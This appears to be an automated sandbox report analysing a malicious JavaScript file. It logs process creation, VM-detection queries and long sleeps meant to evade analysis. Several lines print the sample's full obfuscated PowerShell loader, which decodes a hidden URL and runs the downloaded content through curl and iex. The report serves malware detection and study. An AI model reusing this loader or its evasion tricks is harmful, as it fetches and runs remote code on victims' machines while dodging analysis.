yZQdBJjNe9jKpJce7dFyLNBkcNsEITvp9JoW5aoCEeiTHqIvyHmBV/S/W7KgZPx5rWESljP/cbEUimJB7ZM5E4WNz7PAM7T3IUaAkcPgMMO1ZllDwVINawK1fkXRxqGExG893bDfaZ/Zg1FLJRqRRyTrT38coqBOzbwcwGZRsuFqtUJ7a5MPlRsYQakf/SDxE46QlDh8r8OQ8tBQhazIs8uqw4t1DAyGUXVwW8FlMhyQwxbEUNoz47W8XIn5Z1/CXCWMeERAJyBjcjCYcgrgHkEiPHsRcLHIerGnyi3Ing1grzoaOMFFKdvtb5ROTvCVTXtvA5c/xn6zJNVpVU3A/Zt9oPGpZb4rtNXFgcN
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: f699.jsVirustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: f699.jsStatic file information: File size 1253522 > 1048576
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B78D2A5 pushad ; iretd 2_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A8162 push ebx; ret 2_2_00007FFD9B8A816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8B61D1 push eax; ret 2_2_00007FFD9B8B61DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB930EA push edx; iretd 2_2_00007FFD9BB930EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB944FA pushad ; retf 2_2_00007FFD9BB944FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB94D0A push eax; ret 2_2_00007FFD9BB94D0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BC0D4E3 push eax; iretd 2_2_00007FFD9BC0D629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BC0CFB3 push eax; iretd 2_2_00007FFD9BC0CFED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BC0CBAC push esi; retf 0000h2_2_00007FFD9BC0CBB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BC0CBD8 push es; retf 2_2_00007FFD9BC0CBD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BC0CB92 push esi; retf 0000h2_2_00007FFD9BC0CBA9

Persistence and Installation Behavior

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3689Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6189Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep count: 3689 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 6189 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000002.00000002.1800811353.000001B34652C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
